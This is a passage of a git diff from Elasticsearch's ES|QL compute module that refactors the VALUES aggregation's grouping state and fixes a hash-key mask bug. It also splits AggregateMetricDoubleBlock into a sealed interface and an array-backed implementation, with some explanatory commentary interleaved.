hashIds.getInt(ordinalIds.getInt(v))); } } } @@ -135,7 +135,7 @@ public void add(int positionOffset, IntArrayBlock groupIds) { int groupEnd = groupStart + groupIds.getValueCount(groupPosition); for (int g = groupStart; g < groupEnd; g++) { int groupId = groupIds.getInt(g); - state.values.add(groupId, hashIds.getInt(ordinalIds.getInt(groupPosition + positionOffset))); + state.addValueOrdinal(groupId, hashIds.getInt(ordinalIds.getInt(groupPosition + 
positionOffset))); } } } @@ -150,7 +150,7 @@ public void add(int positionOffset, IntBigArrayBlock groupIds) { int groupEnd = groupStart + groupIds.getValueCount(groupPosition); for (int g = groupStart; g < groupEnd; g++) { int groupId = groupIds.getInt(g); - state.values.add(groupId, hashIds.getInt(ordinalIds.getInt(groupPosition + positionOffset))); + state.addValueOrdinal(groupId, hashIds.getInt(ordinalIds.getInt(groupPosition + positionOffset))); } } } @@ -159,7 +159,7 @@ public void add(int positionOffset, IntBigArrayBlock groupIds) { public void add(int positionOffset, IntVector groupIds) { for (int groupPosition = 0; groupPosition < groupIds.getPositionCount(); groupPosition++) { int groupId = groupIds.getInt(groupPosition); - state.values.add(groupId, hashIds.getInt(ordinalIds.getInt(groupPosition + positionOffset))); + state.addValueOrdinal(groupId, hashIds.getInt(ordinalIds.getInt(groupPosition + positionOffset))); } } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/X-ValuesAggregator.java.st b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/X-ValuesAggregator.java.st index 67f32fc4a4d4e..fa8ffecea052d 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/X-ValuesAggregator.java.st +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/X-ValuesAggregator.java.st @@ -43,12 +43,9 @@ $if(BytesRef)$ import org.elasticsearch.compute.data.OrdinalBytesRefBlock; $endif$ import org.elasticsearch.compute.operator.DriverContext; -$if(BytesRef)$ +import org.elasticsearch.core.Releasable; import org.elasticsearch.core.Releasables; -$else$ - -$endif$ /** * Aggregates field values for $type$. * This class is generated. Edit @{code X-ValuesAggregator.java.st} instead @@ -90,8 +87,8 @@ $endif$ return state.toBlock(driverContext.blockFactory()); } - public static GroupingState initGrouping(BigArrays bigArrays) { - return new GroupingState(bigArrays); + public static GroupingState initGrouping(DriverContext driverContext) { + return new GroupingState(driverContext); } $if(BytesRef)$ @@ -113,25 +110,7 @@ $if(BytesRef)$ $endif$ public static void combine(GroupingState state, int groupId, $type$ v) { -$if(long)$ - state.values.add(groupId, v); -$elseif(double)$ - state.values.add(groupId, Double.doubleToLongBits(v)); -$elseif(BytesRef)$ - state.values.add(groupId, BlockHash.hashOrdToGroup(state.bytes.add(v))); -$elseif(int)$ - /* - * Encode the groupId and value into a single long - - * the top 32 bits for the group, the bottom 32 for the value. - */ - state.values.add((((long) groupId) << Integer.SIZE) | (v & 0xFFFFFFFFL)); -$elseif(float)$ - /* - * Encode the groupId and value into a single long - - * the top 32 bits for the group, the bottom 32 for the value. 
- */ - state.values.add((((long) groupId) << Float.SIZE) | (Float.floatToIntBits(v) & 0xFFFFFFFFL)); -$endif$ + state.addValue(groupId, v); } public static void combineIntermediate(GroupingState state, int groupId, $Type$Block values, int valuesPosition) { @@ -142,37 +121,27 @@ $endif$ int end = start + values.getValueCount(valuesPosition); for (int i = start; i < end; i++) { $if(BytesRef)$ - combine(state, groupId, values.getBytesRef(i, scratch)); + state.addValue(groupId, values.getBytesRef(i, scratch)); $else$ - combine(state, groupId, values.get$Type$(i)); + state.addValue(groupId, values.get$Type$(i)); $endif$ } } public static void combineStates(GroupingState current, int currentGroupId, GroupingState state, int statePosition) { + if (statePosition > state.maxGroupId) { + return; + } + var sorted = state.sortedForOrdinalMerging(current); + var start = statePosition > 0 ? sorted.counts[statePosition - 1] : 0; + var end = sorted.counts[statePosition]; + for (int i = start; i < end; i++) { + int id = sorted.ids[i]; $if(BytesRef)$ - BytesRef scratch = new BytesRef(); -$endif$ - for (int id = 0; id < state.values.size(); id++) { -$if(long||BytesRef)$ - if (state.values.getKey1(id) == statePosition) { - long value = state.values.getKey2(id); -$elseif(double)$ - if (state.values.getKey1(id) == statePosition) { - double value = Double.longBitsToDouble(state.values.getKey2(id)); -$elseif(int)$ - long both = state.values.get(id); - int group = (int) (both >>> Integer.SIZE); - if (group == statePosition) { - int value = (int) both; -$elseif(float)$ - long both = state.values.get(id); - int group = (int) (both >>> Float.SIZE); - if (group == statePosition) { - float value = Float.intBitsToFloat((int) both); + current.addValueOrdinal(currentGroupId, id); +$else$ + current.addValue(currentGroupId, state.getValue(id)); $endif$ - combine(current, currentGroupId, $if(BytesRef)$state.bytes.get(value, scratch)$else$value$endif$); - } } } @@ -247,6 +216,24 @@ $endif$ } } + /** + * Values are collected in a hash. Iterating over them in order (row by row) to build the output, + * or merging with other state, can be expensive. To optimize this, we build a sorted structure once, + * and then use it to iterate over the values in order. + * + * @param ids positions of the {@link GroupingState#values} to read. +$if(BytesRef)$ + * If built from {@link GroupingState#sortedForOrdinalMerging(GroupingState)}, + * these are ordinals referring to the {@link GroupingState#bytes} in the target state. +$endif$ + */ + private record Sorted(Releasable releasable, int[] counts, int[] ids) implements Releasable { + @Override + public void close() { + releasable.close(); + } + } + /** * State for a grouped {@code VALUES} aggregation. This implementation * emphasizes collect-time performance over the performance of rendering @@ -255,26 +242,31 @@ $endif$ * collector operation. But at least it's fairly simple. 
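For int and float values the template now centralizes this long-packing in GroupingState.addValue: the groupId occupies the top 32 bits and the bit-cast value the bottom 32. The & 0xFFFFFFFFL mask matters because sign-extending a negative int to long would otherwise smear ones into the group bits; Float.SIZE and Integer.SIZE are both 32, so the two variants share one layout. A self-contained illustration of the round trip:

    public class PackDemo {
        public static void main(String[] args) {
            int groupId = 7;
            int value = -42; // negative on purpose: the mask prevents sign-extension
            long both = (((long) groupId) << Integer.SIZE) | (value & 0xFFFFFFFFL);
            int group = (int) (both >>> Integer.SIZE); // 7: the top 32 bits
            int v = (int) both;                        // -42: the bottom 32 bits
            System.out.println(group + " / " + v);
        }
    }

The same 32-bit layout is behind the BytesRef2BlockHash fix further down, which widens the k1 mask from 0xffffL (16 bits, a bug) to 0xffffffffL (the full low 32 bits). Note also that initGrouping now takes the whole DriverContext rather than just BigArrays: the state keeps the BlockFactory so that buildSorted and sortedForOrdinalMerging can account their scratch arrays against the circuit breaker.
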
*/ public static class GroupingState implements GroupingAggregatorState { + private int maxGroupId = -1; + private final BlockFactory blockFactory; $if(long||double)$ private final LongLongHash values; $elseif(BytesRef)$ - final LongLongHash values; + private final LongLongHash values; BytesRefHash bytes; $elseif(int||float)$ private final LongHash values; $endif$ - private GroupingState(BigArrays bigArrays) { + private Sorted sortedForOrdinalMerging = null; + + private GroupingState(DriverContext driverContext) { + this.blockFactory = driverContext.blockFactory(); $if(long||double)$ - values = new LongLongHash(1, bigArrays); + values = new LongLongHash(1, driverContext.bigArrays()); $elseif(BytesRef)$ LongLongHash _values = null; BytesRefHash _bytes = null; try { - _values = new LongLongHash(1, bigArrays); - _bytes = new BytesRefHash(1, bigArrays); + _values = new LongLongHash(1, driverContext.bigArrays()); + _bytes = new BytesRefHash(1, driverContext.bigArrays()); values = _values; bytes = _bytes; @@ -285,7 +277,7 @@ $elseif(BytesRef)$ Releasables.closeExpectNoException(_values, _bytes); } $elseif(int||float)$ - values = new LongHash(1, bigArrays); + values = new LongHash(1, driverContext.bigArrays()); $endif$ } @@ -294,6 +286,36 @@ $endif$ blocks[offset] = toBlock(driverContext.blockFactory(), selected); } +$if(BytesRef)$ + void addValueOrdinal(int groupId, long valueOrdinal) { + values.add(groupId, valueOrdinal); + maxGroupId = Math.max(maxGroupId, groupId); + } + +$endif$ + void addValue(int groupId, $type$ v) { +$if(long)$ + values.add(groupId, v); +$elseif(double)$ + values.add(groupId, Double.doubleToLongBits(v)); +$elseif(BytesRef)$ + values.add(groupId, BlockHash.hashOrdToGroup(bytes.add(v))); +$elseif(int)$ + /* + * Encode the groupId and value into a single long - + * the top 32 bits for the group, the bottom 32 for the value. + */ + values.add((((long) groupId) << Integer.SIZE) | (v & 0xFFFFFFFFL)); +$elseif(float)$ + /* + * Encode the groupId and value into a single long - + * the top 32 bits for the group, the bottom 32 for the value. + */ + values.add((((long) groupId) << Float.SIZE) | (Float.floatToIntBits(v) & 0xFFFFFFFFL)); +$endif$ + maxGroupId = Math.max(maxGroupId, groupId); + } + /** * Builds a {@link Block} with the unique values collected for the {@code #selected} * groups. This is the implementation of the final and intermediate results of the agg. @@ -303,8 +325,23 @@ $endif$ return blockFactory.newConstantNullBlock(selected.getPositionCount()); } + try (var sorted = buildSorted(selected)) { +$if(BytesRef)$ + if (OrdinalBytesRefBlock.isDense(selected.getPositionCount(), Math.toIntExact(values.size()))) { + return buildOrdinalOutputBlock(blockFactory, selected, sorted.counts, sorted.ids); + } else { + return buildOutputBlock(blockFactory, selected, sorted.counts, sorted.ids); + } +$else$ + return buildOutputBlock(blockFactory, selected, sorted.counts, sorted.ids); +$endif$ + } + } + + private Sorted buildSorted(IntVector selected) { long selectedCountsSize = 0; long idsSize = 0; + Sorted sorted = null; try { /* * Get a count of all groups less than the maximum selected group. 
Count @@ -379,28 +416,54 @@ $endif$ idsSize = adjust; int[] ids = new int[total]; for (int id = 0; id < values.size(); id++) { -$if(long||BytesRef||double)$ + $if(long||BytesRef||double)$ int group = (int) values.getKey1(id); -$elseif(float||int)$ + $elseif(float||int)$ long both = values.get(id); int group = (int) (both >>> Float.SIZE); -$endif$ + $endif$ if (group < selectedCounts.length && selectedCounts[group] >= 0) { ids[selectedCounts[group]++] = id; } } -$if(BytesRef)$ - if (OrdinalBytesRefBlock.isDense(selected.getPositionCount(), Math.toIntExact(values.size()))) { - return buildOrdinalOutputBlock(blockFactory, selected, selectedCounts, ids); - } else { - return buildOutputBlock(blockFactory, selected, selectedCounts, ids); + final long totalMemoryUsed = selectedCountsSize + idsSize; + sorted = new Sorted(() -> blockFactory.adjustBreaker(-totalMemoryUsed), selectedCounts, ids); + return sorted; + } finally { + if (sorted == null) { + blockFactory.adjustBreaker(-selectedCountsSize - idsSize); } -$else$ - return buildOutputBlock(blockFactory, selected, selectedCounts, ids); + } + } + + private Sorted sortedForOrdinalMerging(GroupingState other) { + if (sortedForOrdinalMerging == null) { + try (var selected = IntVector.range(0, maxGroupId + 1, blockFactory)) { + sortedForOrdinalMerging = buildSorted(selected); +$if(BytesRef)$ + // hash all the bytes to the destination to avoid hashing them multiple times + BytesRef scratch = new BytesRef(); + final int totalValue = Math.toIntExact(bytes.size()); + blockFactory.adjustBreaker((long) totalValue * Integer.BYTES); + try { + final int[] mappedIds = new int[totalValue]; + for (int i = 0; i < totalValue; i++) { + var v = bytes.get(i, scratch); + mappedIds[i] = Math.toIntExact(BlockHash.hashOrdToGroup(other.bytes.add(v))); + } + // no longer need the bytes + bytes.close(); + bytes = null; + for (int i = 0; i < sortedForOrdinalMerging.ids.length; i++) { + sortedForOrdinalMerging.ids[i] = mappedIds[Math.toIntExact(values.getKey2(sortedForOrdinalMerging.ids[i]))]; + } + } finally { + blockFactory.adjustBreaker(-(long) totalValue * Integer.BYTES); + } $endif$ - } finally { - blockFactory.adjustBreaker(-selectedCountsSize - idsSize); + } } + return sortedForOrdinalMerging; } Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] selectedCounts, int[] ids) { @@ -418,11 +481,11 @@ $endif$ int count = end - start; switch (count) { case 0 -> builder.appendNull(); - case 1 -> append(builder, ids[start]$if(BytesRef)$, scratch$endif$); + case 1 -> builder.append$Type$(getValue(ids[start]$if(BytesRef)$, scratch$endif$)); default -> { builder.beginPositionEntry(); for (int i = start; i < end; i++) { - append(builder, ids[i]$if(BytesRef)$, scratch$endif$); + builder.append$Type$(getValue(ids[i]$if(BytesRef)$, scratch$endif$)); } builder.endPositionEntry(); } @@ -470,29 +533,24 @@ $if(BytesRef)$ } } } +$endif$ - private void append($Type$Block.Builder builder, int id, BytesRef scratch) { - BytesRef value = bytes.get(values.getKey2(id), scratch); - builder.appendBytesRef(value); - } - -$else$ - private void append($Type$Block.Builder builder, int id) { -$if(long)$ - long value = values.getKey2(id); + $type$ getValue(int valueId$if(BytesRef)$, BytesRef scratch$endif$) { +$if(BytesRef)$ + return bytes.get(values.getKey2(valueId), scratch); +$elseif(long)$ + return values.getKey2(valueId); $elseif(double)$ - double value = Double.longBitsToDouble(values.getKey2(id)); + return Double.longBitsToDouble(values.getKey2(valueId)); $elseif(float)$ - 
long both = values.get(id); - float value = Float.intBitsToFloat((int) both); + long both = values.get(valueId); + return Float.intBitsToFloat((int) both); $elseif(int)$ - long both = values.get(id); - int value = (int) both; + long both = values.get(valueId); + return (int) both; $endif$ - builder.append$Type$(value); } -$endif$ @Override public void enableGroupIdTracking(SeenGroupIds seen) { // we figure out seen values from nulls on the values block @@ -501,9 +559,9 @@ $endif$ @Override public void close() { $if(BytesRef)$ - Releasables.closeExpectNoException(values, bytes); + Releasables.closeExpectNoException(values, bytes, sortedForOrdinalMerging); $else$ - values.close(); + Releasables.closeExpectNoException(values, sortedForOrdinalMerging); $endif$ } } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/blockhash/BytesRef2BlockHash.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/blockhash/BytesRef2BlockHash.java index ff25aa1381004..963fd1a3a870f 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/blockhash/BytesRef2BlockHash.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/blockhash/BytesRef2BlockHash.java @@ -145,7 +145,9 @@ public Block[] getKeys() { try { try (BytesRefBlock.Builder b1 = blockFactory.newBytesRefBlockBuilder(positions)) { for (int i = 0; i < positions; i++) { - int k1 = (int) (finalHash.get(i) & 0xffffL); + int k1 = (int) (finalHash.get(i) & 0xffffffffL); + // k1 is always positive, it's how hash values are generated, see BytesRefBlockHash. + // For now, we only manage at most 2^31 hash entries if (k1 == 0) { b1.appendNull(); } else { diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/AggregateMetricDoubleArrayBlock.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/AggregateMetricDoubleArrayBlock.java new file mode 100644 index 0000000000000..b2d5ee0b710d5 --- /dev/null +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/AggregateMetricDoubleArrayBlock.java @@ -0,0 +1,292 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. 
+ */ + +package org.elasticsearch.compute.data; + +import org.elasticsearch.common.io.stream.StreamInput; +import org.elasticsearch.common.io.stream.StreamOutput; +import org.elasticsearch.common.unit.ByteSizeValue; +import org.elasticsearch.core.ReleasableIterator; +import org.elasticsearch.core.Releasables; + +import java.io.IOException; +import java.util.List; +import java.util.stream.Stream; + +public final class AggregateMetricDoubleArrayBlock extends AbstractNonThreadSafeRefCounted implements AggregateMetricDoubleBlock { + private final DoubleBlock minBlock; + private final DoubleBlock maxBlock; + private final DoubleBlock sumBlock; + private final IntBlock countBlock; + private final int positionCount; + + public AggregateMetricDoubleArrayBlock(DoubleBlock minBlock, DoubleBlock maxBlock, DoubleBlock sumBlock, IntBlock countBlock) { + this.minBlock = minBlock; + this.maxBlock = maxBlock; + this.sumBlock = sumBlock; + this.countBlock = countBlock; + this.positionCount = minBlock.getPositionCount(); + for (Block b : List.of(minBlock, maxBlock, sumBlock, countBlock)) { + if (b.getPositionCount() != positionCount) { + assert false : "expected positionCount=" + positionCount + " but was " + b; + throw new IllegalArgumentException("expected positionCount=" + positionCount + " but was " + b); + } + if (b.isReleased()) { + assert false : "can't build aggregate_metric_double block out of released blocks but [" + b + "] was released"; + throw new IllegalArgumentException( + "can't build aggregate_metric_double block out of released blocks but [" + b + "] was released" + ); + } + } + } + + public static AggregateMetricDoubleArrayBlock fromCompositeBlock(CompositeBlock block) { + assert block.getBlockCount() == 4 + : "Can't make AggregateMetricDoubleBlock out of CompositeBlock with " + block.getBlockCount() + " blocks"; + DoubleBlock min = block.getBlock(AggregateMetricDoubleBlockBuilder.Metric.MIN.getIndex()); + DoubleBlock max = block.getBlock(AggregateMetricDoubleBlockBuilder.Metric.MAX.getIndex()); + DoubleBlock sum = block.getBlock(AggregateMetricDoubleBlockBuilder.Metric.SUM.getIndex()); + IntBlock count = block.getBlock(AggregateMetricDoubleBlockBuilder.Metric.COUNT.getIndex()); + return new AggregateMetricDoubleArrayBlock(min, max, sum, count); + } + + public CompositeBlock asCompositeBlock() { + final Block[] blocks = new Block[4]; + blocks[AggregateMetricDoubleBlockBuilder.Metric.MIN.getIndex()] = minBlock; + blocks[AggregateMetricDoubleBlockBuilder.Metric.MAX.getIndex()] = maxBlock; + blocks[AggregateMetricDoubleBlockBuilder.Metric.SUM.getIndex()] = sumBlock; + blocks[AggregateMetricDoubleBlockBuilder.Metric.COUNT.getIndex()] = countBlock; + return new CompositeBlock(blocks); + } + + @Override + protected void closeInternal() { + Releasables.close(minBlock, maxBlock, sumBlock, countBlock); + } + + @Override + public Vector asVector() { + return null; + } + + @Override + public int getTotalValueCount() { + int totalValueCount = 0; + for (Block b : List.of(minBlock, maxBlock, sumBlock, countBlock)) { + totalValueCount += b.getTotalValueCount(); + } + return totalValueCount; + } + + @Override + public int getPositionCount() { + return positionCount; + } + + @Override + public int getFirstValueIndex(int position) { + return minBlock.getFirstValueIndex(position); + } + + @Override + public int getValueCount(int position) { + int max = 0; + for (Block b : List.of(minBlock, maxBlock, sumBlock, countBlock)) { + max = Math.max(max, b.getValueCount(position)); + } + return max; + } + + 
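The new AggregateMetricDoubleArrayBlock is a façade over four parallel sub-blocks (min, max, sum, count): per-position properties are derived from them, and filter, keepMask and readFrom all use the same build-or-release idiom, closing the freshly created sub-blocks whenever the composite result was never assembled. A self-contained sketch of that idiom, with plain AutoCloseable standing in for Releasable:

    final class BuildOrRelease {
        record Composite(AutoCloseable a, AutoCloseable b) {}

        static Composite build(java.util.function.Supplier<AutoCloseable> make) throws Exception {
            Composite result = null;
            AutoCloseable first = null;
            AutoCloseable second = null;
            try {
                first = make.get();
                second = make.get(); // may fail, e.g. when a circuit breaker trips
                result = new Composite(first, second);
                return result;
            } finally {
                if (result == null) { // never assembled: release everything created so far
                    if (second != null) second.close();
                    if (first != null) first.close();
                }
            }
        }
    }

In the class below, the finally branch is a single Releasables.close(...) call, which, as its use here with possibly-null blocks implies, tolerates null entries.
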
@Override + public ElementType elementType() { + return ElementType.AGGREGATE_METRIC_DOUBLE; + } + + @Override + public BlockFactory blockFactory() { + return minBlock.blockFactory(); + } + + @Override + public void allowPassingToDifferentDriver() { + for (Block block : List.of(minBlock, maxBlock, sumBlock, countBlock)) { + block.allowPassingToDifferentDriver(); + } + } + + @Override + public boolean isNull(int position) { + for (Block block : List.of(minBlock, maxBlock, sumBlock, countBlock)) { + if (block.isNull(position) == false) { + return false; + } + } + return true; + } + + @Override + public boolean mayHaveNulls() { + return Stream.of(minBlock, maxBlock, sumBlock, countBlock).anyMatch(Block::mayHaveNulls); + } + + @Override + public boolean areAllValuesNull() { + return Stream.of(minBlock, maxBlock, sumBlock, countBlock).allMatch(Block::areAllValuesNull); + } + + @Override + public boolean mayHaveMultivaluedFields() { + return Stream.of(minBlock, maxBlock, sumBlock, countBlock).anyMatch(Block::mayHaveMultivaluedFields); + } + + @Override + public boolean doesHaveMultivaluedFields() { + if (Stream.of(minBlock, maxBlock, sumBlock, countBlock).noneMatch(Block::mayHaveMultivaluedFields)) { + return false; + } + return Stream.of(minBlock, maxBlock, sumBlock, countBlock).anyMatch(Block::doesHaveMultivaluedFields); + } + + @Override + public AggregateMetricDoubleBlock filter(int... positions) { + AggregateMetricDoubleArrayBlock result = null; + DoubleBlock newMinBlock = null; + DoubleBlock newMaxBlock = null; + DoubleBlock newSumBlock = null; + IntBlock newCountBlock = null; + try { + newMinBlock = minBlock.filter(positions); + newMaxBlock = maxBlock.filter(positions); + newSumBlock = sumBlock.filter(positions); + newCountBlock = countBlock.filter(positions); + result = new AggregateMetricDoubleArrayBlock(newMinBlock, newMaxBlock, newSumBlock, newCountBlock); + return result; + } finally { + if (result == null) { + Releasables.close(newMinBlock, newMaxBlock, newSumBlock, newCountBlock); + } + } + } + + @Override + public AggregateMetricDoubleBlock keepMask(BooleanVector mask) { + AggregateMetricDoubleArrayBlock result = null; + DoubleBlock newMinBlock = null; + DoubleBlock newMaxBlock = null; + DoubleBlock newSumBlock = null; + IntBlock newCountBlock = null; + try { + newMinBlock = minBlock.keepMask(mask); + newMaxBlock = maxBlock.keepMask(mask); + newSumBlock = sumBlock.keepMask(mask); + newCountBlock = countBlock.keepMask(mask); + result = new AggregateMetricDoubleArrayBlock(newMinBlock, newMaxBlock, newSumBlock, newCountBlock); + return result; + } finally { + if (result == null) { + Releasables.close(newMinBlock, newMaxBlock, newSumBlock, newCountBlock); + } + } + } + + @Override + public ReleasableIterator lookup(IntBlock positions, ByteSizeValue targetBlockSize) { + // TODO: support + throw new UnsupportedOperationException("can't lookup values from AggregateMetricDoubleBlock"); + } + + @Override + public MvOrdering mvOrdering() { + // TODO: determine based on sub-blocks + return MvOrdering.UNORDERED; + } + + @Override + public AggregateMetricDoubleBlock expand() { + this.incRef(); + return this; + } + + @Override + public void writeTo(StreamOutput out) throws IOException { + for (Block block : List.of(minBlock, maxBlock, sumBlock, countBlock)) { + block.writeTo(out); + } + } + + public static Block readFrom(StreamInput in) throws IOException { + boolean success = false; + DoubleBlock minBlock = null; + DoubleBlock maxBlock = null; + DoubleBlock sumBlock = null; + IntBlock 
countBlock = null; + BlockStreamInput blockStreamInput = (BlockStreamInput) in; + try { + minBlock = DoubleBlock.readFrom(blockStreamInput); + maxBlock = DoubleBlock.readFrom(blockStreamInput); + sumBlock = DoubleBlock.readFrom(blockStreamInput); + countBlock = IntBlock.readFrom(blockStreamInput); + AggregateMetricDoubleArrayBlock result = new AggregateMetricDoubleArrayBlock(minBlock, maxBlock, sumBlock, countBlock); + success = true; + return result; + } finally { + if (success == false) { + Releasables.close(minBlock, maxBlock, sumBlock, countBlock); + } + } + } + + @Override + public long ramBytesUsed() { + return minBlock.ramBytesUsed() + maxBlock.ramBytesUsed() + sumBlock.ramBytesUsed() + countBlock.ramBytesUsed(); + } + + @Override + public boolean equals(Object obj) { + if (obj instanceof AggregateMetricDoubleBlock that) { + return AggregateMetricDoubleBlock.equals(this, that); + } + return false; + } + + @Override + public int hashCode() { + return AggregateMetricDoubleBlock.hash(this); + } + + public DoubleBlock minBlock() { + return minBlock; + } + + public DoubleBlock maxBlock() { + return maxBlock; + } + + public DoubleBlock sumBlock() { + return sumBlock; + } + + public IntBlock countBlock() { + return countBlock; + } + + public Block getMetricBlock(int index) { + if (index == AggregateMetricDoubleBlockBuilder.Metric.MIN.getIndex()) { + return minBlock; + } + if (index == AggregateMetricDoubleBlockBuilder.Metric.MAX.getIndex()) { + return maxBlock; + } + if (index == AggregateMetricDoubleBlockBuilder.Metric.SUM.getIndex()) { + return sumBlock; + } + if (index == AggregateMetricDoubleBlockBuilder.Metric.COUNT.getIndex()) { + return countBlock; + } + throw new UnsupportedOperationException("Received an index (" + index + ") outside of range for AggregateMetricDoubleBlock."); + } +} diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/AggregateMetricDoubleBlock.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/AggregateMetricDoubleBlock.java index 600b149b4a6c4..9a2736b16e15c 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/AggregateMetricDoubleBlock.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/AggregateMetricDoubleBlock.java @@ -7,297 +7,102 @@ package org.elasticsearch.compute.data; -import org.elasticsearch.common.io.stream.StreamInput; -import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.unit.ByteSizeValue; import org.elasticsearch.core.ReleasableIterator; -import org.elasticsearch.core.Releasables; -import java.io.IOException; import java.util.List; -import java.util.Objects; -import java.util.stream.Stream; -public final class AggregateMetricDoubleBlock extends AbstractNonThreadSafeRefCounted implements Block { - private final DoubleBlock minBlock; - private final DoubleBlock maxBlock; - private final DoubleBlock sumBlock; - private final IntBlock countBlock; - private final int positionCount; - - public AggregateMetricDoubleBlock(DoubleBlock minBlock, DoubleBlock maxBlock, DoubleBlock sumBlock, IntBlock countBlock) { - this.minBlock = minBlock; - this.maxBlock = maxBlock; - this.sumBlock = sumBlock; - this.countBlock = countBlock; - this.positionCount = minBlock.getPositionCount(); - for (Block b : List.of(minBlock, maxBlock, sumBlock, countBlock)) { - if (b.getPositionCount() != positionCount) { - assert false : "expected positionCount=" + positionCount + " but was " + b; - throw new 
IllegalArgumentException("expected positionCount=" + positionCount + " but was " + b); - } - if (b.isReleased()) { - assert false : "can't build aggregate_metric_double block out of released blocks but [" + b + "] was released"; - throw new IllegalArgumentException( - "can't build aggregate_metric_double block out of released blocks but [" + b + "] was released" - ); - } - } - } - - public static AggregateMetricDoubleBlock fromCompositeBlock(CompositeBlock block) { - assert block.getBlockCount() == 4 - : "Can't make AggregateMetricDoubleBlock out of CompositeBlock with " + block.getBlockCount() + " blocks"; - DoubleBlock min = block.getBlock(AggregateMetricDoubleBlockBuilder.Metric.MIN.getIndex()); - DoubleBlock max = block.getBlock(AggregateMetricDoubleBlockBuilder.Metric.MAX.getIndex()); - DoubleBlock sum = block.getBlock(AggregateMetricDoubleBlockBuilder.Metric.SUM.getIndex()); - IntBlock count = block.getBlock(AggregateMetricDoubleBlockBuilder.Metric.COUNT.getIndex()); - return new AggregateMetricDoubleBlock(min, max, sum, count); - } - - public CompositeBlock asCompositeBlock() { - final Block[] blocks = new Block[4]; - blocks[AggregateMetricDoubleBlockBuilder.Metric.MIN.getIndex()] = minBlock; - blocks[AggregateMetricDoubleBlockBuilder.Metric.MAX.getIndex()] = maxBlock; - blocks[AggregateMetricDoubleBlockBuilder.Metric.SUM.getIndex()] = sumBlock; - blocks[AggregateMetricDoubleBlockBuilder.Metric.COUNT.getIndex()] = countBlock; - return new CompositeBlock(blocks); - } - - @Override - protected void closeInternal() { - Releasables.close(minBlock, maxBlock, sumBlock, countBlock); - } +/** + * Block that stores aggregate_metric_double values. + */ +public sealed interface AggregateMetricDoubleBlock extends Block permits AggregateMetricDoubleArrayBlock, ConstantNullBlock { @Override - public Vector asVector() { - return null; - } + AggregateMetricDoubleBlock filter(int... positions); @Override - public int getTotalValueCount() { - int totalValueCount = 0; - for (Block b : List.of(minBlock, maxBlock, sumBlock, countBlock)) { - totalValueCount += b.getTotalValueCount(); - } - return totalValueCount; - } + AggregateMetricDoubleBlock keepMask(BooleanVector mask); @Override - public int getPositionCount() { - return positionCount; - } + ReleasableIterator lookup(IntBlock positions, ByteSizeValue targetBlockSize); @Override - public int getFirstValueIndex(int position) { - return minBlock.getFirstValueIndex(position); - } + AggregateMetricDoubleBlock expand(); + /** + * Compares the given object with this block for equality. Returns {@code true} if and only if the + * given object is a AggregateMetricDoubleBlock, and both blocks are + * {@link #equals(AggregateMetricDoubleBlock, AggregateMetricDoubleBlock) equal}. + */ @Override - public int getValueCount(int position) { - int max = 0; - for (Block b : List.of(minBlock, maxBlock, sumBlock, countBlock)) { - max = Math.max(max, b.getValueCount(position)); - } - return max; - } + boolean equals(Object obj); + /** Returns the hash code of this block, as defined by {@link #hash(AggregateMetricDoubleBlock)}. 
*/ @Override - public ElementType elementType() { - return ElementType.AGGREGATE_METRIC_DOUBLE; - } + int hashCode(); - @Override - public BlockFactory blockFactory() { - return minBlock.blockFactory(); - } - - @Override - public void allowPassingToDifferentDriver() { - for (Block block : List.of(minBlock, maxBlock, sumBlock, countBlock)) { - block.allowPassingToDifferentDriver(); + /** + * Returns {@code true} if the given blocks are equal to each other, otherwise {@code false}. + * Two blocks are considered equal if they have the same position count, and contain the same + * values (including absent null values) in the same order. This definition ensures that the + * equals method works properly across different implementations of the AggregateMetricDoubleBlock interface. + */ + static boolean equals(AggregateMetricDoubleBlock block1, AggregateMetricDoubleBlock block2) { + if (block1 == block2) { + return true; } - } - - @Override - public boolean isNull(int position) { - for (Block block : List.of(minBlock, maxBlock, sumBlock, countBlock)) { - if (block.isNull(position) == false) { - return false; - } - } - return true; - } - - @Override - public boolean mayHaveNulls() { - return Stream.of(minBlock, maxBlock, sumBlock, countBlock).anyMatch(Block::mayHaveNulls); - } - - @Override - public boolean areAllValuesNull() { - return Stream.of(minBlock, maxBlock, sumBlock, countBlock).allMatch(Block::areAllValuesNull); - } - - @Override - public boolean mayHaveMultivaluedFields() { - return Stream.of(minBlock, maxBlock, sumBlock, countBlock).anyMatch(Block::mayHaveMultivaluedFields); - } - - @Override - public boolean doesHaveMultivaluedFields() { - if (Stream.of(minBlock, maxBlock, sumBlock, countBlock).noneMatch(Block::mayHaveMultivaluedFields)) { + final int positions = block1.getPositionCount(); + if (positions != block2.getPositionCount()) { return false; } - return Stream.of(minBlock, maxBlock, sumBlock, countBlock).anyMatch(Block::doesHaveMultivaluedFields); - } - - @Override - public Block filter(int... 
